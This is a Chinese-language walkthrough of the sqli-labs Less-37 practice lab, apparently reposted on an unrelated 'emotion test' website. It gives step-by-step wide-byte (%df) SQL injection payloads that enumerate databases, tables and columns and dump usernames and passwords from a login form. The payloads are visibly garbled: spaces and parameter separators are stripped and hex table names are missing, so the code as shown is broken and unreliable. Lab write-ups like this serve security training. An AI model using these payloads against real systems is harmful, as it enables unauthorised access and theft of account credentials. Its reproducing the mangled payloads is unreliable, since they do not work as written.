情感测试
情感测试

您现在的位置: 情感测试简介_情感测试玩法 > 情感测试答案 > SQLLabsLess37

SQLLabsLess37

发布时间:2021-8-28 13:19:29   点击数:
Sqli-labs-Less-37

通过界面显示可知需要使用post进行注入,使用burp进行抓包

查找注入点

uname=aor1=1passwd=adminsubmit=Submit

查看提醒被转义

加上%df,报错

进行注释,成功,说明存在注入

uname=a%dfor1=1#passwd=adminsubmit=Submit

查看列数

uname=a%dforderby2#passwd=adminsubmit=Submit

为3时报错,说明存在2列

查看当前库

uname=a%dfunionselect1,database()#passwd=adminsubmit=Submit

查看所有库

uname=a%dfunionselect1,group_concat(schema_name)frominformation_schema.schemata#passwd=adminsubmit=Submit

查看所有表

uname=a%dfunionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schema=0x#passwd=adminsubmit=Submit

查看所有字段

uname=a%dfunionselect1,group_concat(column_name)frominformation_schema.columnswheretable_name=0x#passwd=adminsubmit=Submit

查看所有账户和密码

uname=a%dfunionselect1,group_concat(concat_ws(0x7e,username,password))fromsecurity.users#passwd=adminsubmit=Submit

以此类推爆出所有数据。

声明本教程仅提供技术分享,不得用于非法用途利用此文所造成的任何直接或间接的损失,文章作者不承担任何责任网络安全你我他,维护安全靠大家预览时标签不可点收录于话题#个上一篇下一篇

转载请注明:http://www.zmax-alibaba.com/qgda/138096.html

网站简介 | 发布优势 | 服务条款 | 隐私保护 | 广告合作 | 合作伙伴 | 版权申明 | 网站地图

当前时间: